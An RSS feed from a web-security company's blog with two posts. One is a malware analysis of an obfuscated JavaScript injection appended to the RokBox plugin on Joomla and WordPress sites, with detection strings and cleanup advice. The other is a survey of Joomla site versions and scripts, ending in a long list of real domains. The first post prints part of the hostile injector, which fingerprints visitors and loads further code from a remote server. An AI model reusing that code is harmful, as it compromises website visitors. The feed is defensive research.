<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>stopthehacker.com &#187; Joomla</title>
	<atom:link href="http://www.stopthehacker.com/tag/joomla/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.stopthehacker.com</link>
	<description>Jaal, LLC</description>
	<lastBuildDate>Tue, 07 Feb 2012 14:00:27 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.1</generator>
		<item>
		<title>RokBox.js Infections</title>
		<link>http://www.stopthehacker.com/2011/12/08/rokbox-js-infections/</link>
		<comments>http://www.stopthehacker.com/2011/12/08/rokbox-js-infections/#comments</comments>
		<pubDate>Fri, 09 Dec 2011 06:00:36 +0000</pubDate>
		<dc:creator>anirban</dc:creator>
				<category><![CDATA[News]]></category>
		<category><![CDATA[Report]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[blacklist]]></category>
		<category><![CDATA[javascript]]></category>
		<category><![CDATA[Joomla]]></category>
		<category><![CDATA[malware]]></category>
		<category><![CDATA[rokbox]]></category>
		<category><![CDATA[RokBox.js]]></category>
		<category><![CDATA[Wordpress]]></category>

		<guid isPermaLink="false">http://www.stopthehacker.com/?p=3208</guid>
		<description><![CDATA[Today&#8217;s websites make use of many third party plugins to add new functionality with the least amount of effort. The inclusion of these third party plugins brings significant additional risk, namely the introduction of vulnerabilities to one&#8217;s website through vulnerabilities in the plugin itself. A prime example of this is the Timthumb malware outbreak that [...]]]></description>
			<content:encoded><![CDATA[<p>Today&#8217;s websites make use of many third party plugins to add new functionality with the least amount of effort. The inclusion of these third party plugins brings significant additional risk, namely the introduction of vulnerabilities to one&#8217;s website through vulnerabilities in the plugin itself.</p>
<p>A prime example of this is the Timthumb malware outbreak that we discovered some time ago. In this post, we will discuss the malware infecting another third party plugin, RokBox. At this time, we have not seen very many websites with this issue, so we do not know if a vulnerability in RokBox is the root cause of the infection. However, the malware code we discuss has been found on Joomla and WordPress sites where the RokBox plugin is installed. </p>
<p><strong>What does a third party plugin do?</strong><br />
Third party plugins allow websites to include new functionality without much effort on the part of the website owner. They can improve the management and display of images, allow the insertion of audio and video players, and in general improve the user experience.</p>
<p>Additionally, third party plugins are very popular among website administrators and designers because they allow good looking websites with advanced capabilities to be launched rapidly.</p>
<p><strong>What is RokBox?</strong><br />
According to the RocketTheme website, on which RokBox is hosted, RokBox &#8220;is a mootools powered JavaScript slideshow that allows you to quickly and easily display multiple media formats including images, videos (video sharing services also) and music.&#8221; It also provides a theme management system that allows website owners to create their own custom themes and manage them. It is a successor to the RokZoom plugin. RokBox is very popular with administrators of Joomla websites.</p>
<p><em>More details about RokBox: <a href="http://www.rockettheme.com/extensions-joomla/rokbox">Joomla Extensions &#8211; RokBox</a>.</em></p>
<p><strong>How do I identify the malicious code?</strong><br />
The malware is appended at the very end of the benign RokBox JavaScript (Dean Edwards packed). The malware loads additional malware from the IP address 91.196.216.64, which is based in Russia. </p>
<p>A sample of the actual malware is shown below:</p>
<pre class="brush: jscript; title: ; notranslate">
var _0xdc8d=[&quot;\x73\x63\x5F\x63\x6F&quot;,&quot;\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64&quot;,&quot;\x63\x6F\x6C\x6F\x72\x44\x65\x70\x74\x68&quot;,&quot;\x77\x69\x64\x74\x68&quot;,&quot;\x68\x65\x69\x67\x68\x74&quot;,&quot;\x63\x68\x61\x72\x73\x65\x74&quot;,&quot;\x6C\x6F\x63\x61\x74\x69\x6F\x6E&quot;,&quot;\x72\x65\x66\x65\x72\x72\x65\x72&quot;,&quot;\x75\x73\x65\x72\x41\x67\x65\
[snipped]
x43\x68\x69\x6C\x64&quot;];element=document[_0xdc8d[1]](_0xdc8d[0]);if(!element){cls=screen[_0xdc8d[2]];sw=screen[_0xdc8d[3]];sh=screen[_0xdc8d[4]];dc=document[_0xdc8d[5]];lc=document[_0xdc8d[6]];refurl=escape(document[_0xdc8d[7]]);ua=escape(navigator[_0xdc8d[8]]);var js=document[_0xdc8d[10]](_0xdc8d[9]);js[_0xdc8d[11]]=_0xdc8d[0];js[_0xdc8d[12]]=_0xdc8d[13]+refurl+_0xdc8d[14]+cls+_0xdc8d[15]+sw+_0xdc8d[16]+sh+_0xdc8d[17]+dc+_0xdc8d[18]+lc+_0xdc8d[19]+ua;var head=document[_0xdc8d[21]](_0xdc8d[20])[0];head[_0xdc8d[22]](js);} ;
</pre>
<p>A sample of the benign RokBox code is shown below:</p>
<pre class="brush: jscript; title: ; notranslate">
/**
* RokBox System Plugin
*
* @package		Joomla
* @subpackage	RokBox System Plugin
* @copyright Copyright (C) 2009 RocketTheme. All rights reserved.
* @license http://www.gnu.org/copyleft/gpl.html GNU/GPL, see RT-LICENSE.php
* @author RocketTheme, LLC
*
* RokBox System Plugin includes:
* ------------
* SWFObject v1.5: SWFObject is (c) 2007 Geoff Stearns and is released under the MIT License:
* http://www.opensource.org/licenses/mit-license.php
* -------------
* JW Player: JW Player is (c) released under CC by-nc-sa 2.0:
* http://creativecommons.org/licenses/by-nc-sa/2.0/
*
*/

eval(function(p,a,c,k,e,d){e=function(c){return(c&amp;lt;a?'':e(parseInt(c/a)))+((c=c%a)&amp;gt;35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k1||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};
</pre>
<p><strong>Is my site infected?</strong><br />
To find out if your site is infected, search for the strings &#8220;_0xdc8d&#8221;, &#8220;refurl&#8221;, and &#8220;\x63&#8243; all in the same file. You can use tools like grep or wingrep to help you. Further, make sure that all of your plugins and your WordPress or Joomla installations are up to date. It is a good practice to change all your access passwords as well to ensure your security.</p>
<p><strong>How should I protect my site</strong><br />
Webmasters and administrators should search for instances of the malware (including malicious links, iframes, scripts, etc.) on their sites and ensure that they remove all occurrences. More importantly, it is critical to continuously monitor your website for compromise. You need to know if your website has been compromised so you can keep your visitors and your online reputation from being hurt.</p>
<p>StopTheHacker.com customers are protected against these kind of threats. If you would like more information on how to protect your website, please feel free to <a href="http://www.stopthehacker.com/contact/">contact us</a>. You can also visit our <a href="http://www.stopthehacker.com/services/">services page</a> to protect your website right now.</p>
<p>Till next time&#8230;</p>
]]></content:encoded>
			<wfw:commentRss>http://www.stopthehacker.com/2011/12/08/rokbox-js-infections/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Analyzing Popular CMSs: Are Joomla Users at Risk?</title>
		<link>http://www.stopthehacker.com/2010/02/01/analyzing-popular-cmses-sites-using-joomla/</link>
		<comments>http://www.stopthehacker.com/2010/02/01/analyzing-popular-cmses-sites-using-joomla/#comments</comments>
		<pubDate>Mon, 01 Feb 2010 17:00:55 +0000</pubDate>
		<dc:creator>anirban</dc:creator>
				<category><![CDATA[News]]></category>
		<category><![CDATA[Report]]></category>
		<category><![CDATA[CMS]]></category>
		<category><![CDATA[Joomla]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[website reputation]]></category>

		<guid isPermaLink="false">http://www.stopthehacker.com/?p=1173</guid>
		<description><![CDATA[In this series of articles, we will be discussing issues relevant to popular Content Management Systems (CMS). These software packages make it relatively simple for web-administrators and lay people to host a website or an Internet forum and manage the content on it. Using a CMS, one can easily keep track of various versions of [...]]]></description>
			<content:encoded><![CDATA[<p>In this series of articles, we will be discussing issues relevant to popular Content Management Systems (CMS). These software packages make it relatively simple for web-administrators and lay people to host a website or an Internet forum and manage the content on it. Using a CMS, one can easily keep track of various versions of web-pages, allow visitors to contribute to the pages and host complex discussion forums too.</p>
<p>CMS software packages have gained widespread popularity owing to the easy to use interface they provide to web-administrators. CMS packages can be easy to set up. Most web hosting companies already have CMS packages ready to be set up on their client&#8217;s account, all the clients need to do is click a button in their hosting control panel! Furthermore, maintaining web-pages using CMS software takes away the pain of keeping track of multiple versions, manually granting user permissions and other mundane issues.</p>
<p><a href="http://www.joomla.org" target="_blank">Joomla</a> is prime example of popular CMS packages. With thousands of downloads and upwards of 7,000 followers on Twitter, this CMS package is extremely popular among web-administrators and content publishers. <a href="http://www.joomla.org/" target="_blank">Joomla</a> offers the flexibility to manage content easily, add attractive themes and customize web-pages to your hearts content. All this can be achieved without having any programming experience.</p>
<p>In this series of posts, we will be looking at five popular CMSs. <a href="http://www.joomla.org/" target="_blank">Joomla</a> is the first one on which we will focus.</p>
<p><strong>The aim of the experiment:</strong></p>
<ul>
<li>To determine the number of <a href="http://www.joomla.org/" target="_blank">Joomla</a> sites using older versions of the CMS package (and hence vulnerable to attacks).</li>
<li>What associated scripts do <a href="http://www.joomla.org/" target="_blank">Joomla</a> users use in addition to core <a href="http://www.joomla.org/" target="_blank">Joomla</a> functionality?</li>
<li>What are the vulnerabilities of using the associated scripts?</li>
</ul>
<p><strong>Experiment methodology:</strong></p>
<p>An initial corpus of 100,000 websites was mined (via <a href="http://www.google.com" target="_blank">Google</a>) using a keyword search to locate websites which discussed <a href="http://www.joomla.org/" target="_blank">Joomla</a>. Understandably, not all 100,000 websites would actually be using <a href="http://www.joomla.org/" target="_blank">Joomla</a>. Of these, approximately 10,000 websites from this corpus were analyzed. Each website was analyzed to determine if it was generated by Joomla. Each website was also cross-referenced with the <a href="http://www.google.com/tools/firefox/safebrowsing/" target="_blank">Google Safe Browsing List</a>. The experiment was completed between January 27th and January 29th, 2010.</p>
<p><strong>We present the most interesting results in brief:</strong></p>
<ul>
<li>In 80.25% of <a href="http://www.joomla.org/" target="_blank">Joomla</a> websites examined, the version of the installation could be determined.</li>
<li>All websites for which the <a href="http://www.joomla.org/" target="_blank">Joomla</a> version could be identified were running Joomla 1.5.<br />
<em>Note: <a href="http://www.governmentsecurity.org/forum/index.php?showtopic=30939" target="_blank">Publicly available exploits for Joomla version &lt; 1.5.6 exist</a>.</em></li>
<li>None of the <a href="http://www.joomla.org/" target="_blank">Joomla</a> sites were blacklisted by <a href="http://www.google.com/tools/firefox/safebrowsing/" target="_blank">Google Safe Browsing</a>.</li>
<li>Only 0.84% of <a href="http://www.joomla.org/" target="_blank">Joomla</a> sites had Iframes embedded in them.</li>
<li>75% of <a href="http://www.joomla.org/" target="_blank">Joomla</a> sites using Iframes were using Mootools.</li>
<li>79% of <a href="http://www.joomla.org/" target="_blank">Joomla</a> sites use Mootools.<br />
<em>Note: <a href="http://www.stopthehacker.com/2009/11/18/when-benign-scripts-attack-iii/" target="_blank">MooTools has been known to be targeted by malicious hackers as a code-injection delivery mechanism</a>.</em></li>
<li>Only 0.42% of <a href="http://www.joomla.org/" target="_blank">Joomla</a> sites use AC_RunActiveContent.js.<br />
<em>Note: When using HTML templates in Flash CS3 Professional, a JavaScript file linked to the HTML file, named AC_RunActiveContent.js is automatically created.</em></li>
<li>Only 0.63% of <a href="http://www.joomla.org/" target="_blank">Joomla</a> sites use jQuery.<br />
<em>Note: <a href="http://www.stopthehacker.com/2009/12/09/when-benign-scripts-attack-v/" target="_blank">JQuery has been known to be targeted by malicious hackers as a code-injection delivery mechanism</a>.</em></li>
</ul>
<p>This limited experiment showed that there is a correlation between <a href="http://www.joomla.org/" target="_blank">Joomla</a> installations and vulnerabilities targeted by hackers to spread malware. It will be interesting to compare this trend with the trends of the CMS packages that we will analyze in the coming days. Nonetheless, it is heartening to see that none of the websites hosting Joomla 1.5 were actually listed on <a href="http://www.google.com/tools/firefox/safebrowsing/" target="_blank">Google&#8217;s Safe Browsing List</a>.</p>
<p>Till next time.<br />
<span id="more-1173"></span><br />
Below we present a sample of the websites using <a href="http://www.joomla.org/" target="_blank">Joomla</a>.</p>
<pre class="brush: plain; title: ; notranslate">
123ror.no
123-vle.com
1-euro-gmbh.com
1stoneonline.org
22paths.com
5-bhai.org
989vip.com
abc-webshop.com
abqjournal.com
absolutetraders.co.za
absolutionists.com
aerospacehorizons.com
afocusonyourfuture.com
akiraciai.com
albania4arab.com
alkatron.it
allbdevents.com
alphasoundstudios.com
anesthesiacare.com
angkasa.gov.my
annmurphyflorists.com
aominions.org
ap2.joomlapraise.com
apfmi.com
arabicamusic.tv
arawaktech.com
aritcon.de
atelier-rousseaufrederic.com
autoadoption.com
azbukapro.net
babymar.net
back2africa.nl
balittro.litbang.deptan.go.id
bassittenterprises.com
bavdw.com
beancounterz.org
bebejour.com
bellevuecollisioncare.com
belmontstudenthousing.com
bhpartners.net
biblioteca.catie.ac.cr
bic.moe.go.th
big-sammys-hotdogs.com
big-sammyshotdogs.com
billhope.net
brandartistlife.com
brazilpedia.com
brazzilinfo.com
brokerlarry.com
budgetsupplement.nl
bulgarialettings.co.uk
buttonwillowhq.com
calaqueroleta.com
cantyouhear.com
carbonkiller.com
caribbeancomputercompany.com
caribenscoutgroup.org
cartagocomercial.com
ccauroraems.com
cehcp.org
cellularoptimization.com
centralcoastlavenderfestival.com
centrocnc.com
centrometeosiciliano.com
chaipat.or.th
chechenews.com
chezcesaria.com
chuckdiehl.com
classics.uc.edu
clipcdc.com
cmfm.net
cobaltcamera.com
co.douglas.ne.us
colegioignacioaldama.com
coltraining.org
combilling.ru
computerscm.com
connorsphotography.net
crezz.org
crittersgallery.com
cuibs.org
cygnet-ecm.com
cypcstore.com
d22485318.a37.agcreativehosting.com
dakofix.de
dan-brown.org
darklevel.org
davidstanleytransport.com
dcuweb.com
deckboat.co.za
delmarfishing.com
demo.mosets.com
denicarnahan.com
detcompservices.com
diabetic-health.info
discospheric.com
dmgmusicgroup.com
docwithms.com
dongvienthai.com
dreamtive.com
drnunemacher.com
droidcon.de
drsusiehill.com
dsmdataservices.com
dubmum.com
dunklspace.com
dwaynemorris.com
ebay-is-out.com
e-dynamics.net
elaps-timing.com
ellistyle.com
email-synchronisation.com
energyharvestpr.com
esperantox.com
eventklik.com
evergreenrugby.com
evropskemesto.cz
famiri-lisse.com
fishbowlpr.com
flyingphoenixheavenlyhealingchikung.com
fma.or.th
focusonyourfuture.com
freshoutsourcing.com
freshwaterbolivar.com
frittomisto.co.uk
gattos.co.uk
ghtex.com
gibreview.com
glenwinfield.com
globalclear.org
globalfreejob.com
globalhudson.com
globalstandards.com.au
guneseviprojesi.com
gvdiabetes.com
hamroyatayat.com
hcasaints.net
health-only.com
heliossrl.eu
herenistarion.org
herenya.com
highereducationmanagement.eu
hiregolfclubsdubai.com
hostiopatiacancun.com
hostmyreports.com
host.nodesixvps.com
htdquailguideservice.com
huacatambo.com
hypnosis-mp3.com
iajgs.org
ibeatradio.com
ibexevents.com.au
icoayouths.com
idiverseme.com
ihelpchurch.com
infopascani.ro
internal.mmi.co.id
intimacyquestions.com
ioc3.unesco.org
ipeterborough.com
ipitest.com
issnaf.org
iwebxpert.net
jackogle.info
jaguar.boxsecured.com
jaildata.net
jamskater.com
jewelrywebstores.com
jini.gr
jinovc.com
jmandgroup.com
joomfish.org
joomla2me.com
jrosecatering.com
juarezcustomhomes.com
jyperkins.com
kaarigar.net
kedema.com
khushab.org
killtribe.com
kycstudios.com
lagartozero.com
lapocioni.net
lawyerarlington.com
learn-web-hacking.com
levietphuc.com
lexprototus.com
liquidcrystalsounds.com
livingoceansfoundation.org
llstoreuk.com
loungebase.com
lovekeke.com
low-gi.info
macmagicians.com
mad-as-hell.org
malandscape.net
mambo.web-joy.de
marksotelo.com
mathewgagnon.net
mekofa.dbbank.net
mikestute.com
mileagecorrectionservices.com
mindyourbusiness.net
mit.undip.ac.id
mjkltd.net
modavideolari.com
mongoosepress.info
montrealquebeclatino.com
morgansisland.net
motobuzz.co.cc
mountainxtra.com
mpninsider.com
mthoodfun.com
muddyjosh.com
mylanka.org
myperfectalgeria.com
mywillinstructed.com
nappydread-i.com
naturwissenschaftler.de
neidevserver.net
newgrantinfo.com
newsitebuilders.com
number12secret.com
obcian.com
ocsopedia.com
odw.biz
oldbenzhome.com
oldchevyshome.com
oldcornersaloon.com
oldfordshome.com
oldminishome.com
oldmoparshome.com
oldrovershome.com
oldtruckshome.com
oldvwshome.com
olympusmobile.net
omnium-gatherum.net
organics-recycling.org.uk
organizeutah.com
ost-au.com
osteopatiacancun.com
parrishwomble.com
pasautorepair.com
pcb-design.org
pfoa-mc.org
pfoa-ms.org
pieceofcakekitchen.com
pilsum.com
platinum-cars-uk.com
plot-shop-online.de
poderesaude.com.br
postcardsfromlasvegas.com
prezemi.com
primetarget.org
primrosetelecom.co.uk
profootballdraftinsider.com
prohairsupplies.com
projectnucleus.org
protestthehero.eu
purebreaddeli.com
quadcitysquares.com
rainbowextravaganza.com
rapatsa.com
rarenovaction.com
rawinontario.com
rechtsanwalt-online.eu
remembertheyard.com
roomatthecastle.com
roylon.com
rshm.gov.tr
saletop.com
salvitae.eu
sandyrosenbaum.com
sarah-kurtz.org
scenicworld.co.uk
scienceworksforus.org
sdakinship.net
seblod-dev.com
seegchina.eu
serenajohnson.org
sharelancer.com
silverstarmountain.ca
silvertipgroup.com
simplyaskus.com
sindhhyd.com
siparuntum.com
siteground11.com
sjubc.com
sovereignty-empire.com
spoorsweb.nl
sportingconservation.org
spravochnic.com
stalyticsdemo.com
stampsales.net
stanleyvictor.com
stefanomazza.net
stmarkcentre.org.uk
sunithi.freei.me
superhorsetraining.com
swimwithjenny.co.uk
synopticcoders.co.uk
sysexpo.com
tamilcircle.net
team4fun.eu
testingforclient.com
tfmandassociatesinc.com
thebattleforliberty.com
theeyesarethesame.com
themandalfamily.com
tibebat.com
time4nascar.com
tingtinghan.net
tinocoysantamaria.com
ti-wow.com
town.williston.vt.us
tpsacanada.com
translationmanager.org
trkconsulting.org
tropicaleditions.com
tuxpro.com
tychoseye.nl
un-instraw.org
unitekk.com
usaffiliates.net
usroot.com
vajira.ac.th
ventaszonafranca.com
vibranted.com
virtualpbxcompare.info
vividtuning.com
waverleywoollahra.ses.nsw.gov.au
websauce.org.au
welldone-hannah.com
westsidepawn.biz
wetzlar-kurier.net
wheninvisiblechildrensing.org
whereyougot.com
wilhelminaschool.eu
windjammerlodge.com
wolverine2812.com
womenoftheucc.com
ws1.njpac.org
wtfchefs.us
www3a.biotec.or.th
xband.eu
xenones.gr
xpand-productions.com
xperteaze.net
yahyaayhanacar.com
yarmouthnet.com
yellow-advertising.com
yourchoicetech.com
youreasymemories.com
zephyrfm.com
zombiz.net
</pre>
]]></content:encoded>
			<wfw:commentRss>http://www.stopthehacker.com/2010/02/01/analyzing-popular-cmses-sites-using-joomla/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

